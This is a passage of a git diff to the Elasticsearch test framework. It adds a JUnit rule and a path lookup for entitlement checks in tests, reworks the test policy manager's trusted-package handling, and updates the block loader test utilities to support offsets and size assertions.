License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.entitlement.bootstrap; + +import org.apache.lucene.tests.mockfile.FilterPath; +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.entitlement.runtime.policy.PathLookup; +import org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir; +import org.elasticsearch.entitlement.runtime.policy.TestPolicyManager; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; +import org.elasticsearch.test.ESTestCase; +import org.junit.rules.TestRule; +import org.junit.runner.Description; +import org.junit.runners.model.Statement; + +import java.io.Closeable; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.List; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.function.Consumer; + +import static org.elasticsearch.env.Environment.PATH_DATA_SETTING; +import static org.elasticsearch.env.Environment.PATH_HOME_SETTING; +import static org.elasticsearch.env.Environment.PATH_REPO_SETTING; +import static org.elasticsearch.env.Environment.PATH_SHARED_DATA_SETTING; + +public class TestEntitlementsRule implements TestRule { + private static final Logger logger = LogManager.getLogger(TestEntitlementsRule.class); + + private static final AtomicBoolean active = new AtomicBoolean(false); + private final TestPolicyManager policyManager; + private final TestPathLookup pathLookup; + + public TestEntitlementsRule() { + policyManager = TestEntitlementBootstrap.testPolicyManager(); + pathLookup = TestEntitlementBootstrap.testPathLookup(); + assert (policyManager == null) == (pathLookup == null); + } + + @Override + public Statement apply(Statement base, Description description) { + assert description.isSuite() : "must be used as ClassRule"; + + // class / suite level + boolean withoutEntitlements = description.getAnnotation(ESTestCase.WithoutEntitlements.class) != null; + boolean withEntitlementsOnTestCode = description.getAnnotation(ESTestCase.WithEntitlementsOnTestCode.class) != null; + var entitledPackages = description.getAnnotation(ESTestCase.EntitledTestPackages.class); + + if (policyManager != null) { + return new Statement() { + @Override + public void evaluate() throws Throwable { + if (active.compareAndSet(false, true)) { + try { + pathLookup.reset(); + policyManager.setActive(false == withoutEntitlements); + policyManager.setTriviallyAllowingTestCode(false == withEntitlementsOnTestCode); + if (entitledPackages != null) { + assert entitledPackages.value().length > 0 : "No test packages specified in @EntitledTestPackages"; + policyManager.setEntitledTestPackages(entitledPackages.value()); + } else { + policyManager.setEntitledTestPackages(); + } + policyManager.clearModuleEntitlementsCache(); + // evaluate the suite + base.evaluate(); + } finally { + pathLookup.reset(); + policyManager.resetAfterTest(); + active.set(false); + } + } else { + throw new AssertionError("TestPolicyManager doesn't support test isolation, test suits cannot be run in parallel"); + } + } + }; + } else if (withEntitlementsOnTestCode) { + throw new AssertionError( + "Cannot use @WithEntitlementsOnTestCode on tests that are not configured to use entitlements for testing" + ); + } else { + return base; + } + } + + /** + * Temporarily adds node paths based entitlements based on a node's {@code settings} and {@code configPath} + * until the returned handle is closed. + * @see PathLookup + */ + public Closeable addEntitledNodePaths(Settings settings, Path configPath) { + if (policyManager == null) { + return () -> {}; // noop if not running with entitlements + } + + var unwrappedConfigPath = configPath; + while (unwrappedConfigPath instanceof FilterPath fPath) { + unwrappedConfigPath = fPath.getDelegate(); + } + EntitledNodePaths entitledNodePaths = new EntitledNodePaths(settings, unwrappedConfigPath, this::removeEntitledNodePaths); + addEntitledNodePaths(entitledNodePaths); + return entitledNodePaths; + } + + /** + * Revoke all entitled node paths. + */ + public void revokeAllEntitledNodePaths() { + if (policyManager != null) { + pathLookup.reset(); + policyManager.clearModuleEntitlementsCache(); + } + } + + private record EntitledNodePaths(Settings settings, Path configPath, Consumer onClose) implements Closeable { + private Path homeDir() { + return absolutePath(PATH_HOME_SETTING.get(settings)); + } + + private Path configDir() { + return configPath != null ? configPath : homeDir().resolve("config"); + } + + private Path[] dataDirs() { + List dataDirs = PATH_DATA_SETTING.get(settings); + return dataDirs.isEmpty() + ? new Path[] { homeDir().resolve("data") } + : dataDirs.stream().map(EntitledNodePaths::absolutePath).toArray(Path[]::new); + } + + private Path[] sharedDataDir() { + String sharedDataDir = PATH_SHARED_DATA_SETTING.get(settings); + return Strings.hasText(sharedDataDir) ? new Path[] { absolutePath(sharedDataDir) } : new Path[0]; + } + + private Path[] repoDirs() { + return PATH_REPO_SETTING.get(settings).stream().map(EntitledNodePaths::absolutePath).toArray(Path[]::new); + } + + @SuppressForbidden(reason = "must be resolved using the default file system, rather then the mocked test file system") + private static Path absolutePath(String path) { + return Paths.get(path).toAbsolutePath().normalize(); + } + + @Override + public void close() { + // wipePendingDataDirectories in tests requires entitlement delegation to work as this uses server's FileSystemUtils. + // until ES-10920 is solved, node grants cannot be removed until the test suite completes unless explicitly removing all node + // grants using revokeNodeGrants where feasible. + // onClose.accept(this); + } + + @Override + public String toString() { + return Strings.format( + "EntitledNodePaths[configDir=%s, dataDirs=%s, sharedDataDir=%s, repoDirs=%s]", + configDir(), + dataDirs(), + sharedDataDir(), + repoDirs() + ); + } + } + + private void addEntitledNodePaths(EntitledNodePaths entitledNodePaths) { + logger.debug("Adding {}", entitledNodePaths); + pathLookup.add(BaseDir.CONFIG, entitledNodePaths.configDir()); + pathLookup.add(BaseDir.DATA, entitledNodePaths.dataDirs()); + pathLookup.add(BaseDir.SHARED_DATA, entitledNodePaths.sharedDataDir()); + pathLookup.add(BaseDir.SHARED_REPO, entitledNodePaths.repoDirs()); + policyManager.clearModuleEntitlementsCache(); + } + + private void removeEntitledNodePaths(EntitledNodePaths entitledNodePaths) { + logger.debug("Removing {}", entitledNodePaths); + pathLookup.remove(BaseDir.CONFIG, entitledNodePaths.configDir()); + pathLookup.remove(BaseDir.DATA, entitledNodePaths.dataDirs()); + pathLookup.remove(BaseDir.SHARED_DATA, entitledNodePaths.sharedDataDir()); + pathLookup.remove(BaseDir.SHARED_REPO, entitledNodePaths.repoDirs()); + policyManager.clearModuleEntitlementsCache(); + } +} diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java new file mode 100644 index 0000000000000..1e491dec1d710 --- /dev/null +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java @@ -0,0 +1,88 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.entitlement.bootstrap; + +import org.apache.lucene.tests.mockfile.FilterFileSystem; +import org.elasticsearch.entitlement.runtime.policy.PathLookup; + +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import java.util.function.BiConsumer; +import java.util.function.BiFunction; +import java.util.stream.Stream; + +import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.TEMP; + +class TestPathLookup implements PathLookup { + private final Map> baseDirPaths; + + TestPathLookup(Path tempDir) { + baseDirPaths = new ConcurrentHashMap<>(); + baseDirPaths.put(TEMP, List.of(tempDir)); + } + + @Override + public Path pidFile() { + return null; + } + + @Override + public Stream getBaseDirPaths(BaseDir baseDir) { + return baseDirPaths.getOrDefault(baseDir, List.of()).stream(); + } + + @Override + public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { + return Stream.empty(); + } + + @Override + public boolean isPathOnDefaultFilesystem(Path path) { + var fileSystem = path.getFileSystem(); + if (fileSystem.getClass() != DEFAULT_FILESYSTEM_CLASS) { + while (fileSystem instanceof FilterFileSystem ffs) { + fileSystem = ffs.getDelegate(); + } + } + return fileSystem.getClass() == DEFAULT_FILESYSTEM_CLASS; + } + + void reset() { + baseDirPaths.keySet().retainAll(List.of(TEMP)); + } + + void add(BaseDir baseDir, Path... paths) { + baseDirPaths.compute(baseDir, baseDirModifier(Collection::add, paths)); + } + + void remove(BaseDir baseDir, Path... paths) { + baseDirPaths.compute(baseDir, baseDirModifier(Collection::remove, paths)); + } + + // This must allow for duplicate paths between nodes, the config dir for instance is shared across all nodes. + private static BiFunction, Collection> baseDirModifier( + BiConsumer, Path> operation, + Path... updates + ) { + // always return a new unmodifiable copy + return (BaseDir baseDir, Collection paths) -> { + paths = paths == null ? new ArrayList<>() : new ArrayList<>(paths); + for (Path update : updates) { + operation.accept(paths, update); + } + return Collections.unmodifiableCollection(paths); + }; + } +} diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java b/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java index 2acb31182c1f8..f7397c8f898ed 100644 --- a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java @@ -9,31 +9,90 @@ package org.elasticsearch.entitlement.runtime.policy; +import org.elasticsearch.common.util.ArrayUtils; import org.elasticsearch.entitlement.runtime.policy.entitlements.Entitlement; +import org.elasticsearch.test.ESTestCase; +import java.net.URI; +import java.net.URISyntaxException; import java.nio.file.Path; +import java.security.CodeSource; +import java.security.ProtectionDomain; +import java.util.Arrays; import java.util.Collection; import java.util.List; import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; import java.util.function.Function; +import static java.util.Objects.requireNonNull; + public class TestPolicyManager extends PolicyManager { + + boolean isActive; + boolean isTriviallyAllowingTestCode; + String[] entitledTestPackages; + + /** + * We don't have modules in tests, so we can't use the inherited map of entitlements per module. + * We need this larger map per class instead. + */ + final Map, ModuleEntitlements> classEntitlementsMap = new ConcurrentHashMap<>(); + final Collection classpath; + final Collection testOnlyClasspath; + public TestPolicyManager( Policy serverPolicy, List apmAgentEntitlements, Map pluginPolicies, Function, PolicyScope> scopeResolver, - Map> pluginSourcePaths, - PathLookup pathLookup + PathLookup pathLookup, + Collection classpath, + Collection testOnlyClasspath ) { - super(serverPolicy, apmAgentEntitlements, pluginPolicies, scopeResolver, pluginSourcePaths, pathLookup); + super(serverPolicy, apmAgentEntitlements, pluginPolicies, scopeResolver, name -> classpath, pathLookup); + this.classpath = classpath; + this.testOnlyClasspath = testOnlyClasspath; + resetAfterTest(); + } + + public void setActive(boolean newValue) { + this.isActive = newValue; + } + + public void setTriviallyAllowingTestCode(boolean newValue) { + this.isTriviallyAllowingTestCode = newValue; + } + + public void setEntitledTestPackages(String... entitledTestPackages) { + if (entitledTestPackages == null || entitledTestPackages.length == 0) { + this.entitledTestPackages = TEST_FRAMEWORK_PACKAGE_PREFIXES; // already validated and sorted + return; + } + + assertNoRedundantPrefixes(TEST_FRAMEWORK_PACKAGE_PREFIXES, entitledTestPackages, false); + if (entitledTestPackages.length > 1) { + assertNoRedundantPrefixes(entitledTestPackages, entitledTestPackages, true); + } + String[] packages = ArrayUtils.concat(TEST_FRAMEWORK_PACKAGE_PREFIXES, entitledTestPackages); + Arrays.sort(packages); + this.entitledTestPackages = packages; + } + + public final void resetAfterTest() { + isActive = false; + isTriviallyAllowingTestCode = true; + entitledTestPackages = TEST_FRAMEWORK_PACKAGE_PREFIXES; + clearModuleEntitlementsCache(); } /** - * Called between tests so each test is not affected by prior tests + * Clear cached module entitlements. + * This is required after updating path entries. */ - public void reset() { - super.moduleEntitlementsMap.clear(); + public final void clearModuleEntitlementsCache() { + assert moduleEntitlementsMap.isEmpty() : "We're not supposed to be using moduleEntitlementsMap in tests"; + classEntitlementsMap.clear(); } @Override @@ -44,7 +103,36 @@ protected boolean isTrustedSystemClass(Class requestingClass) { @Override boolean isTriviallyAllowed(Class requestingClass) { - return isTestFrameworkClass(requestingClass) || isEntitlementClass(requestingClass) || super.isTriviallyAllowed(requestingClass); + if (isActive == false) { + return true; + } + if (isEntitlementClass(requestingClass)) { + return true; + } + if (isTestFrameworkClass(requestingClass)) { + return true; + } + if ("org.elasticsearch.jdk".equals(requestingClass.getPackageName())) { + // PluginsLoaderTests, PluginsServiceTests, PluginsUtilsTests + return true; + } + if ("org.elasticsearch.nativeaccess".equals(requestingClass.getPackageName())) { + // UberModuleClassLoaderTests + return true; + } + if (requestingClass.getPackageName().startsWith("org.elasticsearch.plugins")) { + // PluginsServiceTests, NamedComponentReaderTests + return true; + } + if (isTriviallyAllowingTestCode && isTestCode(requestingClass)) { + return true; + } + return super.isTriviallyAllowed(requestingClass); + } + + @Override + protected Collection getComponentPathsFromClass(Class requestingClass) { + return classpath; // required to grant read access to the production source and test resources } private boolean isEntitlementClass(Class requestingClass) { @@ -53,7 +141,95 @@ private boolean isEntitlementClass(Class requestingClass) { } private boolean isTestFrameworkClass(Class requestingClass) { - String packageName = requestingClass.getPackageName(); - return packageName.startsWith("org.junit") || packageName.startsWith("org.gradle"); + return isTestFrameworkClass(entitledTestPackages, requestingClass.getPackageName()); + } + + // no redundant entries allowed, see assertNoRedundantPrefixes + static boolean isTestFrameworkClass(String[] sortedPrefixes, String packageName) { + int idx = Arrays.binarySearch(sortedPrefixes, packageName); + if (idx >= 0) { + return true; + } + idx = -idx - 2; // candidate package index (insertion point - 1) + if (idx >= 0 && idx < sortedPrefixes.length) { + String candidate = sortedPrefixes[idx]; + if (packageName.startsWith(candidate) + && (packageName.length() == candidate.length() || packageName.charAt(candidate.length()) == '.')) { + return true; + } + } + return false; + } + + private static boolean isNotPrefixMatch(String name, String prefix, boolean discardExactMatch) { + assert prefix.endsWith(".") == false : "Invalid package prefix ending with '.' [" + prefix + "]"; + if (name == prefix || name.startsWith(prefix)) { + if (name.length() == prefix.length()) { + return discardExactMatch; + } + return false == (name.length() > prefix.length() && name.charAt(prefix.length()) == '.'); + } + return true; + } + + static void assertNoRedundantPrefixes(String[] setA, String[] setB, boolean discardExactMatch) { + for (String a : setA) { + for (String b : setB) { + assert isNotPrefixMatch(a, b, discardExactMatch) && isNotPrefixMatch(b, a, discardExactMatch) + : "Redundant prefix entries: [" + a + ", " + b + "]"; + } + } + } + + private boolean isTestCode(Class requestingClass) { + // TODO: Cache this? It's expensive + for (Class candidate = requireNonNull(requestingClass); candidate != null; candidate = candidate.getDeclaringClass()) { + if (ESTestCase.class.isAssignableFrom(candidate)) { + return true; + } + } + ProtectionDomain protectionDomain = requestingClass.getProtectionDomain(); + CodeSource codeSource = protectionDomain.getCodeSource(); + if (codeSource == null) { + // This can happen for JDK classes + return false; + } + URI needle; + try { + needle = codeSource.getLocation().toURI(); + if (needle.getScheme().equals("jrt")) { + return false; // won't be on testOnlyClasspath + } + } catch (URISyntaxException e) { + throw new IllegalStateException(e); + } + boolean result = testOnlyClasspath.contains(needle); + return result; + } + + private static final String[] TEST_FRAMEWORK_PACKAGE_PREFIXES = { + "org.gradle", + + "org.jcodings", // A library loaded with SPI that tries to create a CharsetProvider + "com.google.common.jimfs", // Used on Windows + + // We shouldn't really need the rest of these. They should be discovered on the testOnlyClasspath. + "com.carrotsearch.randomizedtesting", + "com.sun.tools.javac", + "org.apache.lucene.tests", // Interferes with SSLErrorMessageFileTests.testMessageForPemCertificateOutsideConfigDir + "org.junit", + "org.mockito", + "net.bytebuddy", // Mockito uses this + + "org.bouncycastle.jsse.provider" // Used in test code if FIPS is enabled, support more fine-grained config in ES-12128 + }; + + static { + Arrays.sort(TEST_FRAMEWORK_PACKAGE_PREFIXES); + } + + @Override + protected ModuleEntitlements getEntitlements(Class requestingClass) { + return classEntitlementsMap.computeIfAbsent(requestingClass, this::computeEntitlements); } } diff --git a/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java index 1c785d58f9804..f099aaac463db 100644 --- a/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java @@ -420,13 +420,12 @@ public final void testCacheable() throws IOException { } } - protected final List blockLoaderReadValuesFromColumnAtATimeReader(DirectoryReader reader, MappedFieldType fieldType) + protected final List blockLoaderReadValuesFromColumnAtATimeReader(DirectoryReader reader, MappedFieldType fieldType, int offset) throws IOException { BlockLoader loader = fieldType.blockLoader(blContext()); List all = new ArrayList<>(); for (LeafReaderContext ctx : reader.leaves()) { - TestBlock block = (TestBlock) loader.columnAtATimeReader(ctx) - .read(TestBlock.factory(ctx.reader().numDocs()), TestBlock.docs(ctx)); + TestBlock block = (TestBlock) loader.columnAtATimeReader(ctx).read(TestBlock.factory(), TestBlock.docs(ctx), offset); for (int i = 0; i < block.size(); i++) { all.add(block.get(i)); } @@ -440,7 +439,7 @@ protected final List blockLoaderReadValuesFromRowStrideReader(DirectoryR List all = new ArrayList<>(); for (LeafReaderContext ctx : reader.leaves()) { BlockLoader.RowStrideReader blockReader = loader.rowStrideReader(ctx); - BlockLoader.Builder builder = loader.builder(TestBlock.factory(ctx.reader().numDocs()), ctx.reader().numDocs()); + BlockLoader.Builder builder = loader.builder(TestBlock.factory(), ctx.reader().numDocs()); for (int i = 0; i < ctx.reader().numDocs(); i++) { blockReader.read(i, null, builder); } diff --git a/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java index eb5bbea9e6bba..eeb1a349d8bbc 100644 --- a/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java +++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java @@ -13,6 +13,7 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.index.IndexSettings; import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; @@ -21,14 +22,22 @@ import org.elasticsearch.search.lookup.SearchLookup; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentType; -import org.junit.Assert; +import org.hamcrest.BaseMatcher; +import org.hamcrest.Description; +import org.hamcrest.Matcher; import java.io.IOException; +import java.lang.reflect.Array; +import java.util.ArrayList; +import java.util.List; import java.util.Map; import java.util.Set; import static org.apache.lucene.tests.util.LuceneTestCase.newDirectory; import static org.apache.lucene.tests.util.LuceneTestCase.random; +import static org.elasticsearch.index.mapper.BlockLoaderTestRunner.PrettyEqual.prettyEqualTo; +import static org.elasticsearch.test.ESTestCase.between; +import static org.elasticsearch.test.ESTestCase.randomBoolean; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.equalTo; @@ -44,7 +53,7 @@ public void runTest(MapperService mapperService, Map document, O var documentXContent = XContentBuilder.builder(XContentType.JSON.xContent()).map(document); Object blockLoaderResult = setupAndInvokeBlockLoader(mapperService, documentXContent, blockLoaderFieldName); - Assert.assertEquals(expected, blockLoaderResult); + assertThat(blockLoaderResult, prettyEqualTo(expected)); } private Object setupAndInvokeBlockLoader(MapperService mapperService, XContentBuilder document, String fieldName) throws IOException { @@ -62,7 +71,11 @@ private Object setupAndInvokeBlockLoader(MapperService mapperService, XContentBu ); LuceneDocument doc = mapperService.documentMapper().parse(source).rootDoc(); - iw.addDocument(doc); + /* + * Add three documents with doc id 0, 1, 2. The real document is 1. + * The other two are empty documents. + */ + iw.addDocuments(List.of(List.of(), doc, List.of())); iw.close(); try (DirectoryReader reader = DirectoryReader.open(directory)) { @@ -76,9 +89,32 @@ private Object load(BlockLoader blockLoader, LeafReaderContext context, MapperSe // `columnAtATimeReader` is tried first, we mimic `ValuesSourceReaderOperator` var columnAtATimeReader = blockLoader.columnAtATimeReader(context); if (columnAtATimeReader != null) { - BlockLoader.Docs docs = TestBlock.docs(0); - var block = (TestBlock) columnAtATimeReader.read(TestBlock.factory(context.reader().numDocs()), docs); - assertThat(block.size(), equalTo(1)); + int[] docArray; + int offset; + if (randomBoolean()) { + // Half the time we load a single document. Nice and simple. + docArray = new int[] { 1 }; + offset = 0; + } else { + /* + * The other half the time we emulate loading a larger page, + * starting part way through the page. + */ + docArray = new int[between(2, 10)]; + offset = between(0, docArray.length - 1); + for (int i = 0; i < docArray.length; i++) { + if (i < offset) { + docArray[i] = 0; + } else if (i == offset) { + docArray[i] = 1; + } else { + docArray[i] = 2; + } + } + } + BlockLoader.Docs docs = TestBlock.docs(docArray); + var block = (TestBlock) columnAtATimeReader.read(TestBlock.factory(), docs, offset); + assertThat(block.size(), equalTo(docArray.length - offset)); return block.get(0); } @@ -95,10 +131,10 @@ private Object load(BlockLoader blockLoader, LeafReaderContext context, MapperSe StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(context, null), leafSourceLoader ); - storedFieldsLoader.advanceTo(0); + storedFieldsLoader.advanceTo(1); - BlockLoader.Builder builder = blockLoader.builder(TestBlock.factory(context.reader().numDocs()), 1); - blockLoader.rowStrideReader(context).read(0, storedFieldsLoader, builder); + BlockLoader.Builder builder = blockLoader.builder(TestBlock.factory(), 1); + blockLoader.rowStrideReader(context).read(1, storedFieldsLoader, builder); var block = (TestBlock) builder.build(); assertThat(block.size(), equalTo(1)); @@ -145,4 +181,86 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { } }); } + + // Copied from org.hamcrest.core.IsEqual and modified to pretty print failure when bytesref + static class PrettyEqual extends BaseMatcher { + + private final Object expectedValue; + + PrettyEqual(T equalArg) { + expectedValue = equalArg; + } + + @Override + public boolean matches(Object actualValue) { + return areEqual(actualValue, expectedValue); + } + + @Override + public void describeTo(Description description) { + description.appendValue(attemptMakeReadable(expectedValue)); + } + + @Override + public void describeMismatch(Object item, Description description) { + super.describeMismatch(attemptMakeReadable(item), description); + } + + private static boolean areEqual(Object actual, Object expected) { + if (actual == null) { + return expected == null; + } + + if (expected != null && isArray(actual)) { + return isArray(expected) && areArraysEqual(actual, expected); + } + + return actual.equals(expected); + } + + private static boolean areArraysEqual(Object actualArray, Object expectedArray) { + return areArrayLengthsEqual(actualArray, expectedArray) && areArrayElementsEqual(actualArray, expectedArray); + } + + private static boolean areArrayLengthsEqual(Object actualArray, Object expectedArray) { + return Array.getLength(actualArray) == Array.getLength(expectedArray); + } + + private static boolean areArrayElementsEqual(Object actualArray, Object expectedArray) { + for (int i = 0; i < Array.getLength(actualArray); i++) { + if (areEqual(Array.get(actualArray, i), Array.get(expectedArray, i)) == false) { + return false; + } + } + return true; + } + + private static boolean isArray(Object o) { + return o.getClass().isArray(); + } + + // Attempt to make assertions readable: + static Object attemptMakeReadable(Object expected) { + try { + if (expected instanceof BytesRef bytesRef) { + expected = bytesRef.utf8ToString(); + } else if (expected instanceof List list && list.getFirst() instanceof BytesRef) { + List expectedList = new ArrayList<>(list.size()); + for (Object e : list) { + expectedList.add(((BytesRef) e).utf8ToString()); + } + expected = expectedList; + } + return expected; + } catch (Exception | AssertionError e) { + // ip/geo fields can't be converted to strings: + return expected; + } + } + + public static Matcher prettyEqualTo(T operand) { + return new PrettyEqual<>(operand); + } + + } } diff --git a/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java index 779d7a2a976d9..b746609f8d659 100644 --- a/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java +++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java @@ -12,6 +12,7 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.SortedDocValues; import org.apache.lucene.util.BytesRef; +import org.hamcrest.Matcher; import java.io.IOException; import java.io.UncheckedIOException; @@ -19,11 +20,14 @@ import java.util.HashMap; import java.util.List; +import static org.elasticsearch.test.ESTestCase.assertThat; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.hasSize; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; public class TestBlock implements BlockLoader.Block { - public static BlockLoader.BlockFactory factory(int pageSize) { + public static BlockLoader.BlockFactory factory() { return new BlockLoader.BlockFactory() { @Override public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { @@ -33,6 +37,10 @@ public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { @Override public BlockLoader.BooleanBuilder booleans(int expectedCount) { class BooleansBuilder extends TestBlock.Builder implements BlockLoader.BooleanBuilder { + private BooleansBuilder() { + super(expectedCount); + } + @Override public BooleansBuilder appendBoolean(boolean value) { add(value); @@ -44,12 +52,27 @@ public BooleansBuilder appendBoolean(boolean value) { @Override public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { - return bytesRefs(expectedCount); + class BytesRefsFromDocValuesBuilder extends TestBlock.Builder implements BlockLoader.BytesRefBuilder { + private BytesRefsFromDocValuesBuilder() { + super(expectedCount); + } + + @Override + public BytesRefsFromDocValuesBuilder appendBytesRef(BytesRef value) { + add(BytesRef.deepCopyOf(value)); + return this; + } + } + return new BytesRefsFromDocValuesBuilder(); } @Override public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { class BytesRefsBuilder extends TestBlock.Builder implements BlockLoader.BytesRefBuilder { + private BytesRefsBuilder() { + super(expectedCount); + } + @Override public BytesRefsBuilder appendBytesRef(BytesRef value) { add(BytesRef.deepCopyOf(value)); @@ -67,6 +90,10 @@ public BlockLoader.DoubleBuilder doublesFromDocValues(int expectedCount) { @Override public BlockLoader.DoubleBuilder doubles(int expectedCount) { class DoublesBuilder extends TestBlock.Builder implements BlockLoader.DoubleBuilder { + private DoublesBuilder() { + super(expectedCount); + } + @Override public DoublesBuilder appendDouble(double value) { add(value); @@ -81,6 +108,10 @@ public BlockLoader.FloatBuilder denseVectors(int expectedCount, int dimensions) class FloatsBuilder extends TestBlock.Builder implements BlockLoader.FloatBuilder { int numElements = 0; + private FloatsBuilder() { + super(expectedCount); + } + @Override public BlockLoader.FloatBuilder appendFloat(float value) { add(value); @@ -117,6 +148,10 @@ public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { @Override public BlockLoader.IntBuilder ints(int expectedCount) { class IntsBuilder extends TestBlock.Builder implements BlockLoader.IntBuilder { + private IntsBuilder() { + super(expectedCount); + } + @Override public IntsBuilder appendInt(int value) { add(value); @@ -134,6 +169,10 @@ public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { @Override public BlockLoader.LongBuilder longs(int expectedCount) { class LongsBuilder extends TestBlock.Builder implements BlockLoader.LongBuilder { + private LongsBuilder() { + super(expectedCount); + } + @Override public LongsBuilder appendLong(long value) { add(value); @@ -149,26 +188,30 @@ public BlockLoader.Builder nulls(int expectedCount) { } @Override - public BlockLoader.Block constantNulls() { - BlockLoader.LongBuilder builder = longs(pageSize); - for (int i = 0; i < pageSize; i++) { + public BlockLoader.Block constantNulls(int count) { + BlockLoader.LongBuilder builder = longs(count); + for (int i = 0; i < count; i++) { builder.appendNull(); } return builder.build(); } @Override - public BlockLoader.Block constantBytes(BytesRef value) { - BlockLoader.BytesRefBuilder builder = bytesRefs(pageSize); - for (int i = 0; i < pageSize; i++) { + public BlockLoader.Block constantBytes(BytesRef value, int count) { + BlockLoader.BytesRefBuilder builder = bytesRefs(count); + for (int i = 0; i < count; i++) { builder.appendBytesRef(value); } return builder.build(); } @Override - public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { + public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int expectedCount) { class SingletonOrdsBuilder extends TestBlock.Builder implements BlockLoader.SingletonOrdinalsBuilder { + private SingletonOrdsBuilder() { + super(expectedCount); + } + @Override public SingletonOrdsBuilder appendOrd(int value) { try { @@ -183,8 +226,8 @@ public SingletonOrdsBuilder appendOrd(int value) { } @Override - public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { - return new AggregateMetricDoubleBlockBuilder(); + public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int expectedSize) { + return new AggregateMetricDoubleBlockBuilder(expectedSize); } }; } @@ -239,8 +282,14 @@ public void close() { private abstract static class Builder implements BlockLoader.Builder { private final List values = new ArrayList<>(); + private Matcher expectedSize; + private List currentPosition = null; + private Builder(int expectedSize) { + this.expectedSize = equalTo(expectedSize); + } + @Override public Builder appendNull() { assertNull(currentPosition); @@ -269,6 +318,7 @@ protected void add(Object value) { @Override public TestBlock build() { + assertThat(values, hasSize(expectedSize)); return new TestBlock(values); } @@ -283,12 +333,23 @@ public void close() { * The implementation here is fairly close to the production one. */ private static class AggregateMetricDoubleBlockBuilder implements BlockLoader.AggregateMetricDoubleBuilder { - private final DoubleBuilder min = new DoubleBuilder(); - private final DoubleBuilder max = new DoubleBuilder(); - private final DoubleBuilder sum = new DoubleBuilder(); - private final IntBuilder count = new IntBuilder(); + private final DoubleBuilder min; + private final DoubleBuilder max; + private final DoubleBuilder sum; + private final IntBuilder count; + + private AggregateMetricDoubleBlockBuilder(int expectedSize) { + min = new DoubleBuilder(expectedSize); + max = new DoubleBuilder(expectedSize); + sum = new DoubleBuilder(expectedSize); + count = new IntBuilder(expectedSize); + } private static class DoubleBuilder extends TestBlock.Builder implements BlockLoader.DoubleBuilder { + private DoubleBuilder(int expectedSize) { + super(expectedSize); + } + @Override public BlockLoader.DoubleBuilder appendDouble(double value) { add(value); @@ -297,6 +358,10 @@ public BlockLoader.DoubleBuilder appendDouble(double value) { } private static class IntBuilder extends TestBlock.Builder implements BlockLoader.IntBuilder { + private IntBuilder(int expectedSize) { + super(expectedSize); + } + @Override public BlockLoader.IntBuilder appendInt(int value) { 